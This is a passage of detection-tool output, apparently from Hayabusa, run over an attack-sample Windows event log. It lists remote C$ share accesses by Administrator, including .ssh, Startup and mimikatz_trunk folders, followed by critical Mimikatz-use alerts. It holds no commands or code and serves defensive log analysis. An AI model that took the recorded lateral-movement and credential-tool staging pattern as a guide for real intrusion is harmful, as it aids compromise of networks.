Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 